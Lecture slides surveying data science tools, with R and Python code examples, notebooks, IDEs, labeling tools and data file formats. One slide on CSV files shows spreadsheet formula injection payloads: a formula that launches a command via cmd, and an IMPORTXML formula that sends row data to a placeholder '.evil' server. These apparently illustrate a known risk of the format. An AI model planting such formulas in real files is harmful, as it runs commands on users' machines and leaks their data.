Advanced Analytics in Business [D0S07a] Big Data Platforms & Technologies [D0S06a] Data Science Tools Overview

In-memory analytics Python and Visualization The road to big data Notebooks and development environments Labeling File formats Packaging and versioning systems Model deployment

2 In-memory Analytics

3 https://mattturck.com/data2020/ 4 Many tools and vendors

For experimentation and model development: hyperparameter tuning, logging, autoML For visualization For labeling For data: Hadoop, Spark, streaming data, feature stores, cloud data warehouses, different storage formats For deployment: different environments, pipelines For monitoring and maintenance

5 Heard about Hadoop? Spark? H2O?

Many vendors with their “big data and analytics” stack

Vendors: Amazon, Cloudera, Datameer, DataStax, Dell, Oracle, IBM, MapR, Pentaho, Databricks, Microsoft, Hortonworks, EMC2 “My data lake versus yours” There’s always “roll your own” Open source, or walled garden? Support, features, speed of upgrades? The situation has stabilized a bit (i.e. the champions have settled), but does it matter? 6 Two sides emerge

Infrastructure

Big Data Integration Architecture NoSQL and NewSQL Streaming AI and ML ops

7 Two sides emerge

Analytics

Data Science Machine Learning AI NLP But also still: BI and Visualization

8 There’s a difference

9 In-memory analytics

Your data set fits in memory The assumption of many tools: SAS, SPSS, MATLAB, R, Python, Julia Is this really a problem? Servers with 512GB of RAM have become relatively cheap Cheaper than an HDFS cluster (especially in today’s cloud environment) Implementation makes a difference (representation of the data set in memory) If your task is unsupervised or supervised modeling, you can apply sampling Some algorithms can work in online / batch mode (a sketch follows below)
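A minimal sketch of the online / batch-mode idea using scikit-learn's partial_fit, reading a hypothetical CSV in chunks so the full data set never has to sit in memory at once (file name, chunk size and target column are illustrative):

import pandas as pd
from sklearn.linear_model import SGDClassifier

clf = SGDClassifier()   # linear model trained with stochastic gradient descent
classes = [0, 1]        # partial_fit needs the full set of class labels up front

# transactions.csv stands in for a file too large to load in one go
for chunk in pd.read_csv("transactions.csv", chunksize=100_000):
    X = chunk.drop(columns=["TARGET"])
    y = chunk["TARGET"]
    clf.partial_fit(X, y, classes=classes)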

10 Python and R

11 The big two

The “big two” in modern data science: Python and R Both have their advantages Others are interesting too (e.g. Julia), but still less adopted Vendors such as SAS and SPSS remain as well But bleeding-edge algorithms or techniques found in open-source first Not (really) due to the language itself The language is just an interface Thanks to their huge ecosystem: many packages for data science available “Python is the second best language for everything” Add-on packages/libraries, which typically aim to: Work with higher order arrays (tensors) and apply operations (typically with broadcasting support) Inspired by early array languages such as Ada, APL, FORTRAN, … This then typically forms the basis to provide support for data frames and “wrangling” them E.g. a 2-dimensional matrix where each column can have a different type, together with sort/filter/aggregation functions Which is then used to construct feature matrices to perform un/supervised learning on Using the predictive techniques we’ve seen earlier As well as some techniques to plot and visualize results

12 Analytics with R

Native concept of a “data frame”: a table in which each column contains measurements on one variable, and each row contains one case Unlike a matrix, the data you store in the columns of a data frame can be of various types I.e., one column might be a numeric variable, another might be a factor, and a third might be a character variable. All columns have to be the same length (contain the same number of data items, although some of those data items may be missing values)

Fun read: Is a Dataframe Just a Table?, Yifan Wu, 2019 13 Analytics with R

Hadley Wickham Chief Scientist at RStudio, and an Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University Data Science: ggplot2 for visualizing data

dplyr for manipulating data

tidyr for tidying data

stringr for working with strings

lubridate for working with date/times https://www.tidyverse.org/ Data Import readr for reading .csv and fwf files

readxl for reading .xls and .xlsx files

haven for SAS, SPSS, and Stata files (also: foreign package)

httr for talking to web APIs

rvest for scraping websites

xml2 for importing XML files 14 Modern R

Learning R today? Make sure to use “modern R” principles

tidyverse should be the first package you install

Especially thanks to dplyr , tidyr , stringr , and lubridate

dplyr implements a verb-based data manipulation language Works on normal data frames but can also work with database connections (already a simple way to solve the mid-to-big sized data issue) Verbs can be piped together, similar to a Unix pipe operator

flights %>% select(year, month, day) %>% arrange(desc(year)) %>% head

15 Modern R

delay <- flights %>%
  group_by(tailnum) %>%
  summarise(count = n(),
            dist = mean(distance, na.rm = TRUE),
            delay = mean(arr_delay, na.rm = TRUE))

delay %>%
  filter(count > 20, dist < 2000) %>%
  ggplot(aes(dist, delay)) +
    geom_point(aes(size = count), alpha = 1/2) +
    geom_smooth() +
    scale_size_area()

Also see: https://www.rstudio.com/resources/cheatsheets/

16 Modeling with R

Virtually any unsupervised or supervised algorithm is implemented in R as a package The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process for creating predictive models. The package contains tools for: Data splitting Pre-processing Feature selection Model tuning using resampling Variable importance estimation Caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface You can just use the original package as well if you know what you want Still widely used

17 Modeling with R

require(caret)
require(ggplot2)
require(randomForest)

training <- read.csv("train.csv", na.strings=c("NA",""))
test <- read.csv("test.csv", na.strings=c("NA",""))

# Invoke caret with random forest and 5-fold cross validation
rf_model <- train(TARGET~., data=training, method="rf",
                  trControl=trainControl(method="cv", number=5),
                  ntree=500) # Other parameters can be passed here

print(rf_model)

## Random Forest
##
## 5889 samples
##   53 predictors
##    5 classes: 'A', 'B', 'C', 'D', 'E'
##
## Resampling: Cross-Validated (5 fold)
##
## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712
##
## Resampling results across tuning parameters:
##   mtry  Accuracy  Kappa  Accuracy SD  Kappa SD
##    2    1         1      0.006        0.008
##   27    1         1      0.005        0.006
##   53    1         1      0.006        0.007
##
## Accuracy was used to select the optimal model using the largest value.
## The final value used for the model was mtry = 27.

18 Modeling with R

print(rf_model$finalModel)

## Call:
##  randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE,
##               allowParallel = TRUE)
##                Type of random forest: classification
##                      Number of trees: 500
## No. of variables tried at each split: 27
##
##         OOB estimate of error rate: 0.88%
##
## Confusion matrix:
##      A    B    C   D    E class.error
## A 1674    0    0   0    0     0.00000
## B   11 1119    9   1    0     0.01842
## C    0   11 1015   1    0     0.01168
## D    0    2   10 952    1     0.01347
## E    0    1    0   5 1077     0.00554

19 Modeling with R

The mlr package is an alternative to caret

R does not define a standardized interface for all its machine learning algorithms The mlr package provides infrastructure so that you can focus on your experiments The framework provides supervised methods like classification, regression and survival analysis along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering The package is connected to OpenML, an online platform which aims at supporting collaborative machine learning and makes it easy to share datasets as well as machine learning tasks, algorithms and experiments in order to support reproducible research mlr3 : https://mlr3.mlr-org.com/

Newer, though gaining uptake

20 Modeling with R

library(mlr3)
set.seed(1)

task_iris = TaskClassif$new(id = "iris", backend = iris, target = "Species")

learner = lrn("classif.rpart", cp = 0.01)

train_set = sample(task_iris$nrow, 0.8 * task_iris$nrow)
test_set = setdiff(seq_len(task_iris$nrow), train_set)

# train the model learner$train(task_iris, row_ids = train_set)

# predict data prediction = learner$predict(task_iris, row_ids = test_set)

# calculate performance prediction$confusion

##             truth
## response     setosa versicolor virginica
##   setosa         11          0         0
##   versicolor      0         12         1
##   virginica       0          0         6

measure = msr("classif.acc")
prediction$score(measure)

## classif.acc
##   0.9666667

21 Modeling with R

The modelr package provides functions that help you create elegant pipelines when modelling

By Hadley Wickham; mainly for simple regression models

More information: http://r4ds.had.co.nz/

Modern R approach Starts simple – linear and visual models Good introduction

22 Visualizations with R

ggplot2 reigns supreme By Hadley Wickham Uses a “grammar of graphics” approach A grammar of graphics is a tool that enables us to concisely describe the components of a graphic An abstraction which makes thinking, reasoning and communicating graphics easier Such a grammar allows us to move beyond named graphics (e.g., the “scatterplot”) and gain insight into the deep structure that underlies statistical graphics Original idea: Wilkinson (2006) ggvis : based on ggplot2 and built on top of vega (a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs) Also declaratively describes data graphics Different render targets Interactivity: interact in browser, phone, …

23 Visualizations with R shiny : a web application framework for R

Construct interactive dashboards

24 Other packages worth noting

janitor : tools for cleaning data

stringr : work with text

lubridate : work with times and dates

ROCR : make ROC and other curves (or verification , or pROC , or mltools )

MICE : handle missing data (or naniar )

ROSE : up/down sampling with SMOTE

forecast : time series analysis (or prophet )

leaflet : make maps

igraph : social network analysis

esquisse : drag and drop ggplot2 plot builder (Tableau-style, https://dreamrs.github.io/esquisse/)

assertr : assertions on data

25 Analytics with Python

Python itself is not a statistical / scientific language

SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering

NumPy is the fundamental package for scientific computing with Python A powerful N-dimensional array object, sophisticated (broadcasting) functions, tools for integrating C/C++ and Fortran code, useful linear algebra, … “Let’s make Python’s arrays fast” pandas is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language Python’s “data frame”, uses NumPy matplotlib : comprehensive 2d plotting SciPy library: fundamental library for scientific computing

26 Analytics with Python

“ When operating on two arrays, NumPy compares their shapes element-wise. It starts with the trailing dimensions, and works its way forward. Two dimensions are compatible when they are equal, or one of them is 1. Arrays do not need to have the same number of dimensions, they’re lined up in a trailing fashion. When either of the dimensions compared is one, the other is used. In other words, dimensions with size 1 are stretched or “copied” to match the other.

– https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html “

Image (3d array): 256 x 256 x 3 * Scale (1d array): (1) x (1) x 3 = Result (3d array): 256 x 256 x 3

A (4d array): 8 x 1 x 6 x 1 * B (3d array): (1) x 7 x 1 x 5 = Result (4d array): 8 x 7 x 6 x 5

Learning solid Numpy indexing and broadcasting is a superpower
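As a small runnable illustration of these broadcasting rules and the shape examples above (the array contents are made up):

import numpy as np

image = np.random.rand(256, 256, 3)   # e.g. an RGB image
scale = np.array([0.5, 1.0, 2.0])     # one factor per colour channel, shape (3,)

# Trailing dimensions are compared first: (256, 256, 3) versus (3,)
# The scale vector is "stretched" over the two leading dimensions
result = image * scale
print(result.shape)                   # (256, 256, 3)

a = np.ones((8, 1, 6, 1))
b = np.ones((7, 1, 5))
print((a * b).shape)                  # (8, 7, 6, 5)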

27 Analytics with Python

import pandas as pd
import numpy as np

# df as in the pandas "10 minutes to pandas" tutorial (the values shown below will differ per run)
df = pd.DataFrame(np.random.randn(6, 4), index=pd.date_range("20130101", periods=6), columns=list("ABCD"))

df.sort_values(by='B')

A B C D 2013-01-03 -0.861849 -2.104569 -0.494929 1.071804 2013-01-04 0.721555 -0.706771 -1.039575 0.271860 2013-01-01 0.469112 -0.282863 -1.509059 -1.135632 2013-01-02 1.212112 -0.173215 0.119209 -1.044236 2013-01-06 -0.673690 0.113648 -1.478427 0.524988 2013-01-05 -0.424972 0.567020 0.276232 -1.087401

28 Analytics with Python

NumPy itself is clean and very well documented…

Pandas’ API is a bit of a mess

“Minimally Sufficient Pandas”: https://medium.com/dunder-data/minimally-sufficient-pandas-a8e67f2a2428

E.g. on the different ways to index: .loc is primarily label based ( dataframe.loc['a'] ), but may also be used with a boolean array

.loc will raise KeyError when the items are not found

.iloc is primarily integer position based (from 0 to length-1 of the axis)

.ix supports mixed integer and label based access (deprecated, and removed in pandas 1.0)

Similarly to .loc , .at provides label based scalar lookups, while, .iat provides integer based lookups analogously to .iloc

Oh, and you can still do dataframe.a or dataframe['a']

If df is a sufficiently long DataFrame, then df[1:2] gives the second row, however, df[1] gives an error and df[[1]] gives the second column
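A small sketch of the indexing variants listed above (the toy data frame is illustrative):

import pandas as pd

df = pd.DataFrame({"a": [10, 20, 30], "b": [1.0, 2.0, 3.0]},
                  index=["x", "y", "z"])

df.loc["y"]       # label based: the row labelled "y"
df.iloc[1]        # position based: the second row
df.at["y", "a"]   # scalar lookup by label     -> 20
df.iat[1, 0]      # scalar lookup by position  -> 20
df["a"]           # a column by name ...
df.a              # ... and the attribute shortcut for the same column
df[1:2]           # slicing with df[...] selects rows, not columns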

There are packages like dplython and pandas-ply , though not widely used Pandas does have strong time-series operators, however The situation is a bit better since pandas 1.0: https://pandas.pydata.org/docs/whatsnew/v1.0.0.html 29 Modeling with Python

Modeling offers a better picture

scikit-learn Simple and efficient tools for data mining and data analysis Accessible to everybody, and reusable in various contexts Built on NumPy, SciPy, and matplotlib Open source, commercially usable - BSD license Lots of algorithms implemented Relatively easy to implement your own algorithms statsmodels Python library that provides classes and functions for the estimation of many different statistical models, as well as for conducting statistical tests, and statistical data exploration

30 Modeling with Python

from sklearn.datasets import load_iris
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import numpy as np

iris = load_iris()
df = pd.DataFrame(iris.data, columns=iris.feature_names)
df['is_train'] = np.random.uniform(0, 1, len(df)) <= .75
# pd.Factor has been removed from pandas; use Categorical instead
df['species'] = pd.Categorical.from_codes(iris.target, iris.target_names)

train, test = df[df['is_train'] == True], df[df['is_train'] == False]

features = df.columns[:4]
clf = RandomForestClassifier(n_jobs=2)
y, _ = pd.factorize(train['species'])
clf.fit(train[features], y)

preds = iris.target_names[clf.predict(test[features])]
pd.crosstab(test['species'], preds, rownames=['actual'], colnames=['preds'])

31 Modeling with Python

For some things you’ll have to look elsewhere

scikit-learn tries to provide a unified API for the basic tasks in machine learning, with pipelines and meta-algorithms like grid search to tie everything together
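A minimal sketch of that pipeline + grid-search pattern (the data set and parameter grid are chosen purely for illustration):

from sklearn.datasets import load_iris
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC
from sklearn.model_selection import GridSearchCV

X, y = load_iris(return_X_y=True)

pipe = Pipeline([("scale", StandardScaler()), ("clf", SVC())])
grid = GridSearchCV(pipe, {"clf__C": [0.1, 1, 10]}, cv=5)   # tune the SVC inside the pipeline
grid.fit(X, y)
print(grid.best_params_, grid.best_score_)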

pystruct handles general structured learning

seqlearn handles sequence based learning

surprise or lightfm for recommender engines

statsmodels or prophet for time series

“ Deep learning and reinforcement learning both require a rich vocabulary to define an architecture, with deep learning additionally requiring GPUs for efficient computing. However,

neither of these fit within the design constraints of scikit-learn “

Basic CPU-based artificial neural networks are present, however Some support to work with textual data though – i.e. many featurization options 32 Visualizations with Python

matplotlib : the foundation seaborn : “if matplotlib ‘tries to make easy things easy and hard things possible,’ seaborn tries to make a well-defined set of hard things easy too” ggplot : Python implementation of ggplot2. Not a “feature-for-feature port of ggplot2,” but there’s strong feature overlap Altair : newer library with “pleasant API”

bokeh : similar

yellowbrick : visual diagnostics for ML models Datashader : for massive amounts of data points

Older but fun comparison at: https://dansaber.wordpress.com/2016/10/02/a- dramatic-tour-through-pythons-data-visualization-landscape-including- ggplot-and-altair/

33 Other packages worth noting

imbalanced-learn : up/down sampling with SMOTE and friends

plotnine : another ggplot -style Python plotting tool

tqdm : human friendly progress bars

missingno : handle missing data

dateparser : handling dates in various formats

pyflux : time series analysis (or prophet , or tsfresh )

great_expectations : assertions on data

folium : mapping library

scikit.ml : multilabel techniques

pomegranate : probabilistic models

semisup-learn : semi-supervised models

And there are interops packages to work between R and Python as well (e.g. reticulate )

34 Visualization

35 Packaged software and BI

Apart from the libraries mentioned above, there’s also packaged (“business intelligence”) software

E.g. Tableau, Spotfire, PowerBI, Cognos, Qlikview, SAS Visual Analytics, … Just “use” the tool, no hassle of coding and debugging Ease-of-use Limited in functionality Custom design more difficult Has virtually nothing to do with modeling

36 Packaged software and BI

Niche visualization can require niche tools, though

Web analytics (Google, Adobe, SAS) E.g. process mining: (Disco and friends) Graph visualizations: Gephi, NodeXL, sigma.js, Cytoscape Mapping (Leaflet, Folium, kepler.gl, others)

37 Further libraries to be aware of

d3.js : Javascript-library which made famous the concept of “data-driven” documents D3 allows you to bind arbitrary data to a Document Object Model (DOM), and then apply data-driven transformations to the document For example, you can use D3 to generate an HTML table from an array of numbers. Or, use the same data to create an interactive SVG bar chart with smooth transitions and interaction Direct coupling between data and visualization: changing the data changes the visualisation See: https://github.com/mbostock/d3/wiki/Gallery, http://bl.ocks.org/, http://bl.ocks.org/mbostock and https://bost.ocks.org/mike/

Graphviz: diagram and graph visualizations (serves as the “engine” in many other tools)

Plotly: widely used charting library, with Plotly Dash (https://plot.ly/products/dash/) as a great dashboarding tool for Python (great shiny alternative)
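For instance, a minimal plotly.express chart (the gapminder sample data ships with plotly; a Dash app would wrap such a figure in a dcc.Graph component):

import plotly.express as px

df = px.data.gapminder().query("year == 2007")
fig = px.scatter(df, x="gdpPercap", y="lifeExp", size="pop",
                 color="continent", log_x=True, hover_name="country")
fig.show()                      # renders in the notebook or browser
fig.write_html("chart.html")    # self-contained, shareable HTML file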

38 The Road to Big Data

39 On-GPU analytics

GPU: graphical processing unit

Efficient for massive parallelizable operations (e.g. linear algebra, vector operations) Ecosystem mainly based on Python Hardware support mainly based on NVIDIA GPUs with the CUDA SDK

Training data can be very large (a million images, for instance), but not necessarily stored or handled in a distributed fashion

“Epoch”: one iteration of training over the full training set. For small data sets: exposing a learning algorithm to the entire set of training data (the “batch”) “Minibatch” means that the gradient is calculated across a sample before updating weights Can be done in-memory Computation can be distributed, however: often involves distribution over multiple GPUs, though these are separate approaches from Hadoop and friends, e.g. Apache mxnet – and often come with bottlenecks when used in a networked fashion (so “distributed” often happens by using multiple GPUs in one machine)
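To make the epoch / minibatch terminology concrete, a plain-NumPy sketch of minibatch gradient descent for logistic regression (no GPU involved; the data, batch size and learning rate are made up):

import numpy as np

X = np.random.randn(10_000, 20)
y = (X @ np.random.randn(20) > 0).astype(float)
w = np.zeros(20)
lr, batch_size = 0.1, 256

for epoch in range(5):                           # one epoch = one pass over all training data
    idx = np.random.permutation(len(X))
    for start in range(0, len(X), batch_size):
        b = idx[start:start + batch_size]        # one minibatch
        p = 1 / (1 + np.exp(-X[b] @ w))          # predictions on the minibatch
        w -= lr * X[b].T @ (p - y[b]) / len(b)   # gradient step based on this minibatch only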

40 On-disk analytics

Even if your data set exceeds the boundaries of memory, there might be an easier way than big-data oriented setups: the “intermediate” step before going full “big data”

Learn how to use your package correctly (e.g. apply methods instead of slow for loops!) Use a database and SQL Use a better memory representation (e.g. data.table in R) Memory-mapped files (i.e. “disk-scratching”) ff or bigmemory in R (but not that fun)

disk.frame : https://github.com/xiaodaigh/disk.frame

Dask in Python, similar API as pandas

Pandas on Ray (https://ray.readthedocs.io/en/latest/pandas_on_ray.html) is also popular, powerful when combined with modin (https://github.com/modin-project/modin) (“Modin is a DataFrame designed for datasets from 1KB to 1TB+”) vaex (https://github.com/vaexio/vaex) (works with huge tabular data, process more than a billion rows/second)

Dato (Turi) used to have a great implementation, now open source as SFrame (https://github.com/turi-code/SFrame) and in https://github.com/apple/turicreate

41 On-disk analytics

# pandas: works on a single in-memory CSV
import pandas as pd
df = pd.read_csv('2015-01-01.csv')
df.groupby(df.user_id).value.mean()

# Dask: same API, but lazily over many files; .compute() triggers execution
import dask.dataframe as dd
df = dd.read_csv('2015-*-*.csv')
df.groupby(df.user_id).value.mean().compute()

import graphlab
import graphlab.aggregate as agg
sf = graphlab.SFrame.read_csv('2018-01-01.csv')
sf.groupby(key_columns='user_id', operations={'avg': agg.MEAN('value')})

Careful with this, though. You can end up with Pandas, Dask and Spark code in one spaghetti bowl

Nevertheless, most organizations that jumped on the Spark and co. bandwagon would have been better off taking a good look at the above

It could have been solved with a bunch of servers and a (distributed) on-disk library. Funny how most of these libraries have adopted the directed acyclic graph (DAG) computing approach initially “rediscovered” by Spark as a way to forego MapReduce, something we’ll talk about later

“Pandas is crashing because I’m trying to work with a 50GB data set” is not really an excuse

42 Notebooks and Development Environments

43 Notebooks

Scientific programming in data science is very much concerned with exploration, experimentation, making demos, collaborating, and sharing results

It is this need for experiments, explorations, and collaborations that is addressed by notebooks for scientific computing Notebooks are collaborative web-based environments for data exploration and visualization Similar to a “lab notebook”

The idea of computer notebooks has been around for a long time, starting with the early days of MATLAB and Mathematica in the mid-to-late-80s

Later: SageMath and IPython Today: Jupyter

44 Notebooks

45 Notebooks

The Sage Notebook was released on 24 February 2005 by William Stein

Professor of mathematics at the University of Washington Free and open source software (GNU License), with the initial goal of creating an “open source alternative to Magma, Maple, Mathematica, and MATLAB” Sage is based on Python and focuses on mathematical worksheets

The IPython console was started by Fernando Perez circa 2001

From a first attempt to replicate a Mathematica Notebook with 259 lines of code With the Sage Notebook being a reference, Perez had many collaborations with the Sage team

In 2015, the IPython Notebook project became the Jupyter project

The ability to go beyond Python and run several languages (“kernels”) in a notebook However, it is not possible to have multiple cells with multiple languages within the same notebook Impressive success and steady growth since 2011 46 Notebooks

47 Notebooks

Other alternatives:

Apache Zeppelin: similar in concept to Jupyter Apache Zeppelin is built on the JVM while Jupyter is built on Python Zeppelin offers the possibility to mix languages across cells Zeppelin is mainly oriented towards Spark Was originally positioned as the way forward by many Spark-based vendor stacks, though today Jupyter is the most popular environment, so most stacks now include, or have moved to, Jupyter Beaker: designed from the start to be a fully polyglot notebook. Supports Python, Python3, R, Julia, JavaScript, SQL, Java, Clojure, HTML5, Node.js, C++, LaTeX, Ruby, Scala, Groovy, Kdb Nice idea of mixing languages in the same notebook, but has not really gone anywhere nteract: for those of you that like to have Jupyter installed as a desktop app Includes easier ways for styling observablehq.com The cool new kid on the block Heavily JS oriented See e.g. https://observablehq.com/@bmesuere

48 Notebooks

Jupyter comes with a lot of benefits

Quick iteration, immediate output shown in the notebook Easy to construct “dynamic” reports, by applying your style sheets You can even make them interactive (i.e. through the use of widgets, https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Basics.html) Many extensions to adjust your workflow “Jupyter Hub” to host a multi user Jupyter environment

E.g. Netflix uses papermill to directly execute and schedule Notebooks

papermill is a tool for parameterizing, executing, and analyzing Jupyter Notebooks https://medium.com/netflix-techblog/scheduling-notebooks-348e6c14cfd6 https://github.com/nteract/papermill
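A minimal papermill call (notebook names and parameters are illustrative; the input notebook needs a cell tagged "parameters"):

import papermill as pm

pm.execute_notebook(
    "train_model.ipynb",            # input notebook, containing a "parameters" cell
    "train_model_2021_01.ipynb",    # executed copy, with all outputs included
    parameters={"month": "2021-01", "n_trees": 500},
)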

49 Notebooks

But come with a set of issues as well…

Version control can be problematic Jupyter stores notebooks as one big JSON file, including inputs and outputs Every time you make a change, you need to commit the whole file Code can only be run block-by-block (cell by cell) Can easily mess up the flow of code (non-linear execution) You end up with a notebook which has newer results above the older results Code can end up looking fragmented People start splitting the chunks and forget to put them back together, lose track of the order of the analysis, and it all ends up in a big mess Does not encourage writing modular code You end up copying code fragments from older or other people’s notebooks “Executing” a notebook can be difficult Reproducibility? Export to Python, R?

50 Notebooks https://docs.google.com/presentation/d/1n2RlMdmv1p25Xy5thJUhkKGvjtV-dkAIsUXP-AL4ffI/edit and https://yihui.name/en/2018/09/notebook-war/:

1. Hidden state and out-of-order execution
2. Notebooks are difficult for beginners
3. Notebooks encourage bad habits
4. Notebooks discourage modularity and testing
5. Jupyter’s autocomplete, linting, and way of looking up the help are awkward
6. Notebooks encourage bad processes
7. Notebooks hinder reproducible + extensible science
8. Notebooks make it hard to copy and paste into Slack/Github issues
9. Errors will always halt execution
10. Notebooks make it easy to teach poorly
11. Notebooks make it hard to teach well

51 Notebooks

https://colab.research.google.com

52 Notebooks

https://studio.azureml.net/

53 Notebooks

All cloud providers have realized that the best data science environment to offer is simply Python + Jupyter + the possibility to install packages

The issues can be solved:

Version control can be problematic Fixed in many hosted environments Possible to “roll your own”, e.g. through the use of “git hooks” Code can only be run block-by-block (cell by cell) Enforce strict guidelines Does not encourage writing modular code E.g. see https://github.com/fastai/nbdev “Executing” a notebook can be difficult Solutions exist to overcome this as well, e.g. papermill fast.ai has written a whole book using Jupyter

The takeaway? Notebooks are here to stay

Great tool for exploration, experimentation, development phase of data science, even for showing results in “report” form But additional processes / skills / governance required If not: “throw it over the wall” projects E.g. the end-product of a data scientist should be a (collection of) notebooks which can, at any moment, (re)train the model, save and validate it Common code should be put in separate modules “I like notebooks”

54 IDEs

Integrated development environment

Commonly offers much better debugging, code inspection, documentation capabilities RStudio for R On desktop Or hosted on web server (commercial) Support for Git and others Authoring reports, slide shows Interactive visualizations Spyder for Python Copies the look and feel of RStudio Similar: Rodeo Or IDEs such as PyCharm Or Jupyter Lab Builds on top of Jupyter Adds panel layout, file view

55 IDEs

https://www.rstudio.com/

56 IDEs

https://www.jetbrains.com/pycharm/

57 IDEs

https://github.com/jupyterlab/jupyterlab 58 IDEs

https://code.visualstudio.com/ 59 Getting started

Python

Anaconda Distribution: https://www.continuum.io/downloads Includes Jupyter, Python, data science package repository (also for R)

R

CRAN (base installation): https://cran.r-project.org/ RStudio: https://www.rstudio.com/ Or Jupyter

Hosted (“one click Jupyter”)

Google Colab: https://colab.research.google.com (free) Azure ML Studio: https://studio.azureml.net/ (free) Kaggle Kernels: https://www.kaggle.com/kernels (free) http://paperspace.io/ and https://gradient.paperspace.com/ https://www.floydhub.com/ https://www.crestle.com/ https://www.onepanel.io/ https://www.easyaiforum.cn/ (易学智能) SageMaker, or AWS Google Compute Platform, EC2, Digitalocean… and install yourself

60 Labeling

61 Labeling

Not so easy in real life…

62 Labeling

https://github.com/CrowdCurio/time-series-annotator 63 Labeling

https://github.com/SkalskiP/make-sense

64 Labeling

https://github.com/Labelbox/Labelbox 65 Labeling

https://github.com/NaturalIntelligence/imglab 66 Labeling

For different data types and tasks Manual labelers can be hired as well See https://github.com/heartexlabs/awesome-data-labeling for a good overview Good tools will utilize active learning approaches to speed up the labeling Label some images Train a model Next, ask to label some images for which the model is unsure Other approaches use a pretrained model to speed up the labeling
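A small uncertainty-sampling sketch of that active-learning loop (synthetic data; in practice the "labels arrive" step is the human labeler):

import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression

X, y = make_classification(n_samples=2000, n_features=10, random_state=0)
labeled = np.arange(50)                         # pretend only 50 points are labeled so far
pool = np.arange(50, len(X))                    # the unlabeled pool

for _ in range(5):
    model = LogisticRegression(max_iter=1000).fit(X[labeled], y[labeled])
    proba = model.predict_proba(X[pool])
    uncertainty = 1 - proba.max(axis=1)         # low maximum probability = model is unsure
    ask = pool[np.argsort(uncertainty)[-10:]]   # "please label these 10 next"
    labeled = np.concatenate([labeled, ask])    # labels arrive (simulated here via y)
    pool = np.setdiff1d(pool, ask)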

67 Labeling

https://github.com/koaning/human-learn 68 Labeling

“ Absolutely brilliant. Ever since taking ML classes in MSc and then again in PhD I have wondered why no machine learning approach ever applies such an obvious technique. And most real world datasets are probably adequately addressed with this approach, and everyone regardless of technical background can understand it. ML no longer has to be an inscrutable black box mystery.

As for the “let’s just draw the model” idea, it gets complicated as soon as you’re dealing with more than one input parameter. The author has some workarounds, it looks like.

Being able to project the data into a latent space where classes can be separated is what makes modern ML so valuable.

I don’t understand why this approach is valuable. If you can label your examples using traditional software, why would you build a model? Why not just use the label function in

whatever context you intended the model to exist? “ 69 Labeling

Snorkel Flow: https://snorkel.ai/platform/ Snorkel: https://github.com/snorkel-team/snorkel Snorkel: Rapid Training Data Creation with Weak Supervision: https://arxiv.org/abs/1711.10160

“ Humans provide accidental regularization - and a human made decision boundary can have further fine- tuning by an expert. Even better if you have a generative model which can “hallucinate” parts of the decision boundary which don’t have points. Now you can “probe” your model and have a human intervene if they think parts of the decision

boundary are wrong. “

70 Labeling

Also see:

FlyingSquid: https://github.com/HazyResearch/flyingsquid Alteryx Compose: https://github.com/alteryx/compose

71 File Formats

72 In which format do we store our data?

You might be used to text-based formats (CSV and friends, or Excel), but there are various concerns at play here:

How fast is it to serialize data (write)? How fast can it be read in? How large is it? Column or row based? Easy to distribute? Easy to modify schema?

73 Text based formats

CSV, TSV, JSON, XML Convenient to exchange with other applications or scripts Human readable Bulky and not efficient to query without reading whole structure in memory first Hard to infer schema Compression applies on file-level Still one of the most common formats

74 Text based formats

UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240

UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client, "=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240

http://georgemauer.net/2017/10/07/csv-injection.html

75 Text based formats

76 Sequence files

A persistent data structure for binary key-value pairs “Serialized Java objects” Row-based Commonly used to transfer data in map-reduce jobs (see later) Compression applies on row level Less popular in recent years, not portable

77 Optimized Row Columnar (ORC)

Evolution of the older RCFile Stores collections of rows and within the collection the data is stored in columnar format (combination of row- and column-based) Lightweight indexing Splittable Less popular in recent years

78 Avro

Widely used as a serialization format Row-based, compact binary format Schema is included in the file Supports schema evolution Add, rename and delete columns Compression on record level https://blog.cloudera.com/blog/2009/11/avro-a-new-format-for-data-interchange/

79 Parquet

Column-oriented binary file format Efficient when specific columns are queried Common in data science Parquet is built to support very efficient compression and encoding schemes Parquet allows compression schemes to be specified on a per-column level Good support for schema evolution Can add columns at the end
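For instance, writing and reading Parquet from pandas (requires the pyarrow or fastparquet engine; file and column names are made up):

import pandas as pd

df = pd.DataFrame({"user_id": [1, 2, 3], "value": [0.1, 0.2, 0.3]})
df.to_parquet("events.parquet", compression="snappy")

# Only the requested columns are read, which is where the columnar layout pays off
values = pd.read_parquet("events.parquet", columns=["value"])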

80 SQLite files

Row-oriented file stores Support for multiple tables, schema evolution, SQL querying Integrates nicely with many languages Data sets can become very large

81 HDF5

HDF5 is a data model, library, and file format for storing and managing data Supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high volume and complex data HDF5 is portable and is extensible, allowing applications to evolve in their use of HDF5 A file system within a file Specification is very complex
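A small h5py sketch of that "file system within a file" idea (group, dataset and attribute names are made up):

import numpy as np
import h5py

with h5py.File("experiment.h5", "w") as f:
    grp = f.create_group("run_001")                # groups act like directories
    grp.create_dataset("images", data=np.zeros((100, 64, 64)), compression="gzip")
    grp.attrs["date"] = "2021-01-01"               # metadata attached to the group

with h5py.File("experiment.h5", "r") as f:
    first = f["run_001/images"][:10]               # read only a slice from disk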

82 Kudu

